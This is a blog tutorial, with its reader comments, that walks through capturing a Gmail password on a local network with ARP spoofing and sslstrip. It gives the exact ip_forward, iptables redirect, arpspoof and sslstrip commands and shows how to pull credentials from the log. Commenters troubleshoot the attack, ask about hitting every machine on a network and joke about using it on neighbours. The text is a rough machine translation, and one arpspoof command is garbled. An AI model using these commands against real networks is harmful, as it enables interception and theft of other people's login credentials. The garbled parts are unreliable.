ArpSpoofing és SSlstrip in Action.

Helló Bloggerek.

A mai napra van egy kis mintám arról, hogy milyen veszélyes lehet csatlakozni minden olyan nem biztonságos hálózathoz, amely oly sokaknak tetszik.

A mai napra az ArpSpoofing és az Sslstrip segítségével fogom használni a Gmail jelszavát. A környezet kontrolláltabbá tétele érdekében létrehoztam egy fiókot "testarp@gmail.com".

És mivel nem nagyon szeretem a preambulumokat, térjünk rá az üzletre.

Soha nem vagyok felelős azért, hogy mit tehetnek az alábbi információkkal. Kizárólag oktatási célokra teszem

KÖRNYEZET

Ehhez a teszthez a következő áll rendelkezésünkre:

1. Támadó: Az asztali vagy asztali számítógépem rendelkezik Debian Wheezy-vel. Az adattárakból telepítheti sslstrip y szippantás hogy megszerezzék hárfás

2. Áldozat: Az áldozat egy Android tábla, amely csak a böngészőn keresztül szeretné látni leveleit.

3. A táptalaj: A középső az én Cisco DPC2425 router

CÍMEK.

Támadó címe: 172.26.0.2

Útválasztó címe: 172.26.0.1

Az áldozat címe: 172.26.0.8

A TÁMADÁS:

Ha egy kicsit jobban meg akarja érteni a támadás működését, elmehet a régimhez POST

Az első dolog, amit megteszünk a támadásért, az az előreindítás aktiválása, hogy számítógépünk továbbítsa az információkat az áldozatnak anélkül, hogy észrevennék. (Ellenkező esetben a szolgáltatások megtagadásának támadása lenne)

Ehhez a következőket fogjuk használni:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Minden parancs egy közvetlen konzol ablakban.

Ha most farok -f desdelinux élőben és közvetlenül látjuk az információkat

pillanatkép1

Tehát akkor hogyan érhetjük el azt, amit akarunk?

Először írjuk be e-mailünket a táblagépre. Bejelentkezés közben azt látjuk, hogy ezer és ezer dolog jelenik meg a konzolunkon.

Most, hogy kész, nyissuk meg a fájlunkat "desdelinux” nanoval

nano desdelinux

a Control + W billentyűkombinációval a SECURE POST nevet keresjük.

És látni fogunk valami ilyesmit.

pillanatkép2

Az a hatalmas sor, amely nem látható, az áldozat e-mailje és jelszava.

Tehát jobbra futunk, míg végre meglátjuk a fényt az alagút végén.

pillanatkép3

Egy másik alkalommal meglátjuk, hogyan védhetjük meg magunkat egy kicsit ezektől a támadásoktól.

Üdvözlet


Hagyja megjegyzését

E-mail címed nem kerül nyilvánosságra. Kötelező mezők vannak jelölve *

*

*

  1. Az adatokért felelős: Miguel Ángel Gatón
  2. Az adatok célja: A SPAM ellenőrzése, a megjegyzések kezelése.
  3. Legitimáció: Az Ön beleegyezése
  4. Az adatok közlése: Az adatokat csak jogi kötelezettség alapján továbbítjuk harmadik felekkel.
  5. Adattárolás: Az Occentus Networks (EU) által üzemeltetett adatbázis
  6. Jogok: Bármikor korlátozhatja, helyreállíthatja és törölheti adatait.

  1.   @Jlcux dijo

    Megragadom az alkalmat, hogy elmondjam, amikor a bejegyzés megjelent, a parancsok nem voltak helyesek.

    A végén található iptables parancsból hiányzik a 8080, amely egy másik sorban található. És akkor az arpspoof parancsok ugyanazon a vonalon voltak. Minden parancs külön sorban van.

    Remélhetőleg a szerkesztő látja és meg tudja javítani.

    Üdvözlet.

    1.    A Forrás kézikönyve dijo

      Végeztem az Ön által említett javításokkal, ez rendben van?

      Ha kódot kíván beilleszteni egy preferált bejegyzésbe, akkor használja a HTML nézetet, és ellenőrizze, hogy a cikk helyes-e, mielőtt elküldené függőben. Köszönöm.

  2.   Luis dijo

    Megdöbbentő tudni, hogy azok, akiknek nincs tudásunk, annyira kiszolgáltatottak. Nagyon jó információ, még akkor is, ha keveset értek a témához, felismerem a fontosságát. Köszönöm!
    Üdvözlet

  3.   giskard dijo

    De ez csak akkor működik, ha a támadó és az áldozat ugyanazon a hálózaton vannak. Mindenesetre úgy tűnik számomra, hogy ha (ugyanazon a hálózaton tartózkodva) HTTPS használatával csatlakozik, az nem történik meg, mert az adatok titkosítva vannak, mielőtt elhagyja a gépet. Ha HTTP-n keresztül csatlakozik (S nélkül), akkor úgy gondolom, hogy még a hálózati kábelt nézve is megjelenik a kulcs.

    1.    @Jlcux dijo

      Ez nem igaz. Feltörök ​​egy gmail jelszót, és ha észreveszed, hogy a gmail https-t használ. Így? A lényeg az, hogy bár a https biztonságos, a http-től függ. Tehát nem olyan biztonságos.

      Ne valljon annyit egy https-ről, hogy az S nem a Supermannek szól, hanem a "biztonságos" -nak

    2.    Rten dijo

      https-sel vagy anélkül működik, kipróbáltam egy speciálisabb linux disztróval és problémamentesen működik

    3.    A Forrás kézikönyve dijo

      Pontosan használhatja arra, hogy leckét tanítson azoknak, akik ellopják a Wi-Fi-t. 😀

      Nagyjából olyan, mint amit régen mondtak Chema Alonso blogján:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant dijo

        Ostia, nagyszerű, mit csinál! / És akkor azt mondják a paranoiámnak, valahányszor a VPN-t használom, amikor elmennek a bankszámla ellenőrzésére ...). Egyébként meg kell látni, hogy az emberek mennyire cinikusak a kommentekben ... ha a végén lop ...

        1.    eliotime3000 dijo

          Most oktatóanyagot kell készítenünk a saját VPN-szolgáltatás létrehozásáról és felajánlásáról.

      2.    Daniel dijo

        A linkelt történet nagyon érdekes, sőt érdemesnek tűnik egy regényes könyvhöz, és ez emlékeztet bennem, amikor szomszédaim internetét használtam, és bár azt mondom, hogy ismerem a témát, azt hiszem, soha nem láthattam a az a veszély, hogy utoljára megmaradhattam, szerencsére nekem csak a jelszót változtatták WPA2-re, és itt kezdődött a történetem az internetszolgáltatóval haha

    4.    Mauritius dijo

      Ezért mondja a cím, hogy Sslstrip működik.

      Működik, amíg a támadó középen van

  4.   mindjárt dijo

    Milyen hullámot dolgozol a prizmánál? -.-
    nem.
    Mit vársz, hogy elküldhesd a kérésedet XD
    tekintetében
    jó poszt

  5.   auroszx dijo

    Érdekes, később elvégzek egy oktatási tesztet ... Talán még a WiFi jelszavát is eltávolíthatnám, és szórakozhatnék egy kicsit 😛
    Véletlenül tehet valami hasonlót, hogy különböző oldalakat küldjön a megcélzott oldalaknak? Például meg akarják nyitni a Facebookot, én pedig átirányítom őket a Google-ba? 😛

    1.    @Jlcux dijo

      Igen. De mindez nagyon más tekercs.

      Talán később postázom.

  6.   utolsó újonc dijo

    nagyon jó bejegyzés, ezek a témák nagyon oktató jellegűek, most képesnek kell lennünk ellensúlyozni ezt a támadást, mivel egyesek (például én) nyilvános hálózatokhoz csatlakoznak (például az egyetemhez), hasznos lenne elkerülni.

    Üdvözlet!

  7.   csak egy újabb dl-felhasználó dijo

    Nekem nem sikerült 🙁

  8.   Azta dijo

    Valami kudarcot vall itt, azon kívül, hogy a https-kapcsolatokat egy szerver-tanúsítvány titkosítja (miután a tanúsítvány megtalálható a gépen, a böngészője felelős a titkosításért) olyan iptables-sel, amely a 80-as (http) portot irányítja át, nem a 443-at, ami a https

    1.    @Jlcux dijo

      Én is azt hittem. A lényeg az, hogy bár a https "biztonságos", sajnos a http-től függ. Tehát az sslstrip kihasználja ezt, elhiteti a böngészővel, hogy https-hitelesítő adatokat használ, de nem.

      1.    Azta dijo

        Szent szar! de a böngészőnek látnia kell egy figyelmeztetést, például "ez a tanúsítvány gyanús webhelyről származik, vagy valami hasonló" ... feltétlenül teszteket kell végeznem XD

        1.    @Jlcux dijo

          Nem, semmi sem jön ki.

  9.   csak egy újabb dl-felhasználó dijo

    Végül nekem bevált
    Jelszóval vagyok csatlakoztatva egy WEP hálózathoz, és egyébként is közvetlenül megmutatta a jelszót.

    Egy lekérdezés. Megteheti ugyanazt az eljárást, de az összes számítógéphez, amely csatlakozik a hálózathoz, ahelyett, hogy egyetlen áldozata lenne?

    1.    @Jlcux dijo

      Igen tudsz. De nem végeztem kísérleteket. Próbáld ki te is, és mondd el, hogy megy.

  10.   19. Sinnick dijo

    Ezzel csak annyit kapok, hogy az áldozat gépe offline állapotba kerül, de az sslstrip nem mutat semmit: /

    1.    @Jlcux dijo

      Egy pillanatra le kell tiltania a tűzfalat. Vagy legalább engedélyezze a bejövő kapcsolatokat.

  11.   Mr. Black dijo

    Probe és én csak a facebook oldal felhasználónevét és jelszavát láthattuk, a gmail-ben nem találtam eredményt a naplóban, és csak egy sor arpspoof «arpspoof -i -t« kellett. Másrészt az áldozati gép nem tudott kinyitni néhány oldalt. Folytatom a nyomozást, nagyon érdekes. Segítség azoknak, akik a Manjarót használják, a telepítéshez szükséges csomagok a következők: dsniff (itt az arpspoff), twisted és python2-pyopenssl. Az Sslstrip innen tölthető le: http://www.thoughtcrime.org/software/sslstrip/
    A futtatásához $ python2 sslstrip.py
    Üdvözlet.

  12.   Mr. Black dijo

    Nem jött ki, de az arpspoof sor: #arpspoof -i int -t ip-áldozat ip-router

  13.   Gilbert dijo

    nézd, pontosan azt teszem, amit mondasz:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp - cél-port 80 -j REDIRECT - 8080-as portokhoz

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    a probléma az, hogy az áldozat, aki egy másik pc, hogy itt van a szobámban, nincs kapcsolatom azzal a ponttal, hogy újra kell indítanom az útválasztót, mit tehetek nekem.

    Egy másik dolog, amit virtuális géppel dolgozok, és amikor végrehajtom az iwconfig parancsot, a wlan0 nem jelenik meg, és az ifconfig végrehajtásakor sem, ha azonban van internetem a virtuális gépemen, akkor mi eth0 interfésszel.